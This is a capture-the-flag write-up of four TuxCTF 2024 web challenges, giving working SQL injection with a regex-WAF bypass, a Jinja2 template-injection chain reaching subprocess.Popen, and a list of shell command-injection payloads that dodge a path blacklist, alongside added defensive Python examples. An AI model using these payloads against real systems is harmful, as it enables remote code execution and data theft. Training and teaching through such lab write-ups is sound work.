# tuxCTFV1

### TuxCTF 2024 web Writeups <a href="#tuxctf-2024-web-writeups" id="tuxctf-2024-web-writeups"></a>

Hello, these are the intended solutions for the TuxCTF 2024 web challenges.

### Level1 Sanity Check <a href="#level1-sanity-check" id="level1-sanity-check"></a>

You just have to view the page source (the flag name hints where to look: the comments).

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FUzgRPnac6c5DEMmpYgRT%2Fimage.png?alt=media&#x26;token=8214b984-9301-4c4c-a521-8af96eed0e65" alt=""><figcaption></figcaption></figure></div>

The Flag:

```
tuxCTF{a1wAyS_ch3Ck_C0Mm3ntS}
```

***

### Level2 can you login? <a href="#level2-can-you-login" id="level2-can-you-login"></a>

We open the link and find a login page.

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FQqgcVXXVlxNryhqpEjWy%2Fimage.png?alt=media&#x26;token=45fd97b0-9e60-4dbc-8c4f-b7f8baeea2f4" alt=""><figcaption></figcaption></figure></div>

We are also given the source code; the interesting file is login.php.

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FG5P5b3yxWabdjNeZkudl%2Fimage.png?alt=media&#x26;token=b40541bf-b2c8-4257-a4df-993e5dad11fc" alt=""><figcaption></figcaption></figure></div>

We find a WAF function. The preg\_match call searches for anything that is not a letter or a digit, so any other character gets the request blocked!

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FgQQIRUr8ShFtsGZ6TH0s%2Fimage.png?alt=media&#x26;token=5cdb352b-1413-45b9-8d42-aff067106c2f" alt=""><figcaption></figcaption></figure></div>

But this check can be bypassed: if we give preg\_match a very long input it gives up part-way and returns false instead of a match, the WAF treats that as clean input, and we can do SQL injection!

<div data-full-width="true"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FlbIDxE5TRQLV5F9tHLEc%2Fimage.png?alt=media&#x26;token=e18d2f31-c96a-4567-9c4b-f3afba8fadd0" alt=""><figcaption></figcaption></figure></div>

To bypass the function we generate a long input:

```bash
python3 -c 'print("A" * 9000)'
```

We copy the output and append `' or true-- ` (note the trailing space after `--`) to the end of it.

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FcIDPMVWViIbXh4ZJxsa8%2Fimage.png?alt=media&#x26;token=675c86e5-7819-4031-bedb-ed65f468bdc8" alt=""><figcaption></figcaption></figure></div>

And we have the flag!!!

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FEmIHlh46rWN8Mg2tmedZ%2Fimage.png?alt=media&#x26;token=ee3c5322-1588-483c-8674-81b4cf83db8f" alt=""><figcaption></figcaption></figure></div>

The Flag:

```
tuxCTF{$4n1T!ze_y0Ur_qu3rIeS}
```
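The flag says it: sanitize your queries. As an added example (not the challenge's own PHP code), here is the Level 2 login rebuilt two ways in Python with sqlite3, so the difference between concatenating the username into the SQL text and binding it as a parameter can be seen on the exact payload used above. The table, the account and the `login_*` function names are constructed for this demo; the regex WAF is left out on purpose, because the point is that the parameterized query does not depend on it.

```python
import sqlite3

# Added example (not the challenge's code): the Level 2 login rebuilt two ways
# in Python/sqlite3, so the difference between concatenating the username into
# the SQL text and binding it as a parameter can be seen on the writeup's payload.

PAYLOAD = "A" * 9000 + "' or true-- "   # the writeup's bypass, constructed here


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse-battery')")
    return conn


def login_concatenated(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Query text built from user input: the quote in the payload closes the
    string literal, 'or true' makes the WHERE clause always true, and '-- '
    comments out the password check."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same query with bound parameters: the driver sends the username as a
    value, never as SQL text, so quotes and comment markers have no meaning."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


def demo_login() -> dict:
    """Run both versions against a valid login and against the payload."""
    conn = setup_db()
    return {
        "valid_concat": login_concatenated(conn, "admin", "correct-horse-battery"),
        "valid_param": login_parameterized(conn, "admin", "correct-horse-battery"),
        "payload_concat": login_concatenated(conn, PAYLOAD, "wrong"),
        "payload_param": login_parameterized(conn, PAYLOAD, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo_login().items():
        print(f"{name:15} -> {'logged in' if ok else 'rejected'}")
```

Running it shows the concatenated version logging the payload in with a wrong password, while the parameterized version rejects it and still accepts the real credentials; the 9000 leading characters make no difference either way, because no regex sits in the path.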

***

### Level 3 Templates <a href="#level3-templates" id="level3-templates"></a>

We open the link: the page is empty, but we notice the query parameter `template`.

In the source code we discover it's a Flask web app.

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2F8resrqMFwczrQ3dnhZAS%2Fimage.png?alt=media&#x26;token=cc7af65a-37b4-433c-8a20-56cde9ae40f7" alt=""><figcaption></figcaption></figure></div>

There is also a WAF that blocks some words.

A quick Google search tells us that Flask apps that render user input as a Jinja2 template are vulnerable to SSTI!!!

To test it we use the following payload:

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FwM3e20oNxmQplqH0ZH2P%2Fimage.png?alt=media&#x26;token=4e0a53d1-0332-404d-abed-22f9ba61fcb2" alt=""><figcaption></figcaption></figure></div>

Success: it returned 49, which means the server evaluated the expression.

[SSTI payloads](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2)

Next we try this payload, which lists the subclasses of `object`: `dict.__base__.__subclasses__()`

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FdzP90NWCvuz93og9vkrQ%2Fimage.png?alt=media&#x26;token=9ddd9351-381b-47fe-9cfd-1f33eeac7d73" alt=""><figcaption></figcaption></figure></div>

We get a list of Python classes. The one we are interested in is `subprocess.Popen`: if we can reach it we can run anything on the server!!!

We have two ways to find the index of the Popen class in that list: 1) write a Python script, which I will not do here; 2) fuzz the index until we hit it.

On my local machine I got index 291 (the index depends on the Python version and the modules loaded, so it can differ on the target): `dict.__base__.__subclasses__()[291]`

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FqxL4rhB8lbwaWRqOBYii%2Fimage.png?alt=media&#x26;token=2f2bf5eb-8b5d-43f8-bb5d-e2a89a04cd38" alt=""><figcaption></figcaption></figure></div>

The Full Payload:

```python
dict.__base__.__subclasses__()[291]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()
```

The Flag:

```
tuxCTF{1s_1t_5$ti_0r_5$rf}
```

***

### Level4 dots <a href="#level4-dots" id="level4-dots"></a>

For this challenge you also have the source code.

It's also a Flask web app, but the only route is /run\_command and it only accepts POST requests.

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FC7x5tiyJVmiSPxcdQJT7%2Fimage.png?alt=media&#x26;token=4cdc48a7-0057-49d6-bd86-96fcf8ae9368" alt=""><figcaption></figcaption></figure></div>

Open Burp Suite and intercept the request.

Right-click the request and change the method to POST.

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2F5CGXUA71TrHdOvt2Dq36%2Fimage.png?alt=media&#x26;token=8f9d0190-5901-4627-830f-55a7a6027de6" alt=""><figcaption></figcaption></figure></div>

If you send the request with any body, this is the response:

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FCVbRpRL2ih1xDEZI3A3n%2Fimage.png?alt=media&#x26;token=ce3081b7-7f60-4922-bef8-e4674ccd3f3f" alt=""><figcaption></figcaption></figure></div>

Looking back at the source code, we see that it reads the body parameters as JSON:

```python
data = request.get_json()
```

Then it looks for the key `command` and runs its checks on the value:

```python
    if 'command' in data:
        command = str(data['command'])

        # Length check
        if len(command) < 5:
            return jsonify({'message': 'Command too short'}), 501

        # Perform security checks
        if '..' in command or '/' in command:
            return jsonify({'message': 'Hacking attempt detected'}), 501
```

To send JSON we need to change the Content-Type header to application/json.

Then we add `{"command" : "hi"}` to the body of the request.

Now if we send it we get this response:

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2Fj26787Xttww92PxIf6jP%2Fimage.png?alt=media&#x26;token=ea1e894f-0f60-4041-a628-b73817564aaf" alt=""><figcaption></figcaption></figure></div>

This means our request is being parsed correctly.

Now let's understand how the app works:

```python
        # Find path to executable
        executable_to_run = command.split()[0]

        # Check if we can execute the binary
        if os.access(executable_to_run, os.X_OK):

            # Execute binary if it exists and is executable
            out = os.popen(command).read()
            return jsonify({'message': 'Command output: ' + str(out)}), 200

    return jsonify({'message': 'Not implemented'}), 501


if __name__ == '__main__':

    # Make sure we can only execute binaries in the executables directory
    os.chdir('./executables/')

    # Run server
    app.run(host='0.0.0.0', port=7000)
```

Here we can see that it takes the first word of the command we send (for `{"command" : "hi"}` that is `hi`) and checks whether it is an executable file in the current directory, which is the `executables` directory. We know from the Dockerfile that this directory is empty.

Since the app runs on Linux, a file counts as executable when it has the `x` permission bit.

If we run `ls -la` on a local Linux machine, this is the output:

<figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FGsTcUweTfcsJ3oRGh6KB%2Fimage.png?alt=media&#x26;token=fe6da296-6622-47f7-b5f8-b8632361cf9d" alt=""><figcaption></figcaption></figure>

We notice that `.` and `..` are executable (directories carry the `x` bit, and os.access only checks that bit). `..` is blacklisted, but `.` is not!

If we send `{"command" : "."}` we get "Command too short", but if we pad it with spaces to pass the length check, `{"command" : ". "}`:

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FJv1so5JKELh3LTd469mV%2Fimage.png?alt=media&#x26;token=b3b3f398-d1e4-4323-b72b-712fbd4edb54" alt=""><figcaption></figcaption></figure></div>

It works!!!

The output is empty because `.` by itself doesn't print anything, but since os.popen hands the whole string to a shell, we can chain several commands in one line with a pipe `|` or a semicolon, so let's try that:

`{"command" : ". | pwd"}`

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2Ftz1IGXok8tYzGduHCGjp%2Fimage.png?alt=media&#x26;token=82c1d003-f2bf-4fb5-b76c-14e25b291cde" alt=""><figcaption></figcaption></figure></div>

It works!!!

If we try `{"command" : ". | ls .."}` or `{"command" : ". | ls /"}`, the blacklist catches the `..` or the `/` and it responds with:

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2Fu6Z6DhPqsqnDIdDQK7OL%2Fimage.png?alt=media&#x26;token=9c9e4580-3593-40e7-89b4-b89586b9f5b6" alt=""><figcaption></figcaption></figure></div>

There are a lot of ways to bypass this; I chose `{"command" : ". | ls .''."}`:

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FMaUwywuajcpXocz8c7k9%2Fimage.png?alt=media&#x26;token=f3f0d626-8bad-42b4-8db3-a22fe34327f5" alt=""><figcaption></figcaption></figure></div>

We can see that flag.txt is in the parent directory. To get around the slash restriction we can use `${HOME:0:1}`:

`{"command" : ". | cat .''.${HOME:0:1}flag.txt"}`

To understand the payload: if we run `echo .''.` in any Linux terminal the output is `..`, because the empty quoted string `''` disappears when the shell removes the quotes. `${HOME:0:1}` is shell parameter expansion: we tell the shell to take the `HOME` variable, which exists on every Linux system, and slice it. For example, if the home directory is `/home/kali`, the first character is `/`. So what will actually be executed in the machine's terminal is

You can find various bypass techniques on HackTricks:

[Bypass Linux Restrictions Payloads](https://book.hacktricks.xyz/linux-hardening/bypass-bash-restrictions)

pwned!!!

<div data-full-width="false"><figure><img src="https://421213191-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FfUOAAeVs9eihqxcrtvIC%2Fuploads%2FcVNoJWJGvOfHdekAL37k%2Fimage.png?alt=media&#x26;token=a545c954-0ac4-4b50-89af-ae300b8c7ac6" alt=""><figcaption></figcaption></figure></div>

The Flag:

```
tuxCTF{d0t$_4r3_3XeCut@b13}
```

Here is a list of all the intended payloads for this challenge:

{% code fullWidth="false" %}

```json
{ "command" : ". | ((echo Li4vZmxhZy50eHQ= | base64 -d) | xargs cat)" }
{ "command" : ". | ((echo L3Vzci9zcmMvYXBwL2ZsYWcudHh0 | base64 -d) | xargs cat)"}
{ "command" : ". <(echo true) && cd $(dirname $PWD) && cat flag.txt" }
{ "command" : ". <(echo true) ; cd $(dirname $PWD) ; cat flag.txt" }
{ "command" : ". | cat ${HOME:0:1}usr${HOME:0:1}src${HOME:0:1}app${HOME:0:1}flag.txt" }
{ "command" : ". ; python -c 'import os;x=os.path.normpath(os.getcwd() + os.sep + os.pardir);os.chdir(x);os.system(\"cat flag.txt\")'"}
{ "command" : ". $ or | or ; cat .''.${HOME:0:1}flag.txt 2>&1"}
{ "command" : ". <(echo true) &&  cat  .''.${HOME:0:1}flag.txt " }
```

{% endcode %}
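Every payload in that list works for the same reason: the handler passes a user-controlled string to os.popen, which hands it to /bin/sh, and the `'..'`/`'/'` blacklist inspects the text before the shell rewrites it (`.''.` and `${HOME:0:1}` only become `..` and `/` at expansion time). As an added example, not the challenge's own code, here is a hardened replacement for the /run\_command logic: the command is split into an argv list, the first word must resolve to a regular executable file directly inside the executables directory (checked on the resolved path, which is what defeats `.`, `..` and symlinks), and the program is started without a shell, so pipes, semicolons, quotes and `${...}` are never interpreted. The `is_allowed_executable`/`run_command` names and the temporary directory with a single `hello` script are constructed for this demo; the Flask routing is left out so the block runs offline. The same rule is the fix for Level 3: user input goes into the template as a context variable, never into the template source.

```python
import os
import shlex
import stat
import subprocess
import tempfile

# Added example (not the challenge's code): a hardened version of the Level 4
# /run_command handler. Instead of os.popen(command) behind a '..'/'/' string
# blacklist, it parses the command into an argv list, checks that the executable
# really lives in the executables directory, and runs it without a shell.


def is_allowed_executable(exec_dir: str, name: str) -> bool:
    """True only for a regular executable file directly inside exec_dir.

    The check is done on the resolved path, not on the user's string: '.',
    '.''.' and symlinks look harmless as text but resolve somewhere else.
    """
    base = os.path.realpath(exec_dir)
    if not name or os.sep in name:
        return False
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(candidate) != base:
        return False  # '.', '..' and anything resolving outside base fail here
    return os.path.isfile(candidate) and os.access(candidate, os.X_OK)


def run_command(exec_dir: str, command: str) -> dict:
    """Hardened replacement for `out = os.popen(command).read()`."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return {"ok": False, "message": "Malformed command"}
    if not argv or not is_allowed_executable(exec_dir, argv[0]):
        return {"ok": False, "message": "Not an allowed executable"}
    path = os.path.join(os.path.realpath(exec_dir), argv[0])
    # No shell: every argv element reaches the program verbatim.
    result = subprocess.run([path, *argv[1:]], capture_output=True, text=True, timeout=5)
    return {"ok": True, "message": result.stdout}


def make_demo_dir() -> str:
    """Constructed sample 'executables' directory containing one allowed program."""
    d = tempfile.mkdtemp(prefix="executables-")
    script = os.path.join(d, "hello")
    with open(script, "w") as f:
        f.write("#!/bin/sh\necho hello \"$@\"\n")
    os.chmod(script, os.stat(script).st_mode | stat.S_IXUSR)
    return d


def demo_run_command() -> dict:
    """Run one legitimate command and several of the writeup's payloads."""
    d = make_demo_dir()
    payloads = {
        "legit": "hello world",
        "subshell": "hello $(pwd)",                       # stays a literal argument
        "dot_pipe": ". | pwd",
        "dot_traversal": ". | cat .''.${HOME:0:1}flag.txt",
        "chain": "hello; pwd",
        "sourcing": ". <(echo true) ; cd $(dirname $PWD) ; cat flag.txt",
        "script": ". ; python -c 'import os;os.system(\"cat flag.txt\")'",
    }
    return {name: run_command(d, cmd) for name, cmd in payloads.items()}


if __name__ == "__main__":
    for name, r in demo_run_command().items():
        print(f"{name:14} ok={str(r['ok']):5} {r['message']!r}")
```

Note that `hello $(pwd)` is accepted but prints the literal text `$(pwd)`: without a shell there is nothing to expand it, which is the whole point. The length check and the string blacklist from the original handler are no longer needed, and a blacklist should never be what stands between user input and a shell.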

happy pwning :)
